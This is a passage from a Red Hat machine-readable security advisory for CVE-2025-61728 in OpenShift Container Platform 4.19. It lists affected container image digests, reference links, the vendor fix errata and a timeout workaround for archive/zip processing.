"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-16T10:18:08+00:00",
"details": "For OpenShift Container Platform 4.19 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html/release_notes/\n\nYou may download the oc tool and use it to inspect release image metadata for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.\n\nThe sha values for the release are as follows:\n\n (For x86_64 architecture)\n The image digest is sha256:b274766f7194a7dc825e335a54078790519c0dbe3431c029fd08dbba1c431855\n\n (For s390x architecture)\n The image digest is sha256:066bfcb590ef6f34106e63861d420a3fdcdebd734bb729668c8c6de59b84c632\n\n (For ppc64le architecture)\n The image digest is sha256:ff14e60b2b4760a6c2578e444b40f457fe2322f5211b1b838078b1fa6ea1b443\n\n (For aarch64 architecture)\n The image digest is sha256:52b1e8cf83dd1a854194212cc94bfe2719afb2e014f7b1a315250a9c7273a600\n\nAll OpenShift Container Platform 4.19 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html-single/updating_clusters/index#updating-cluster-cli.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:7249"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
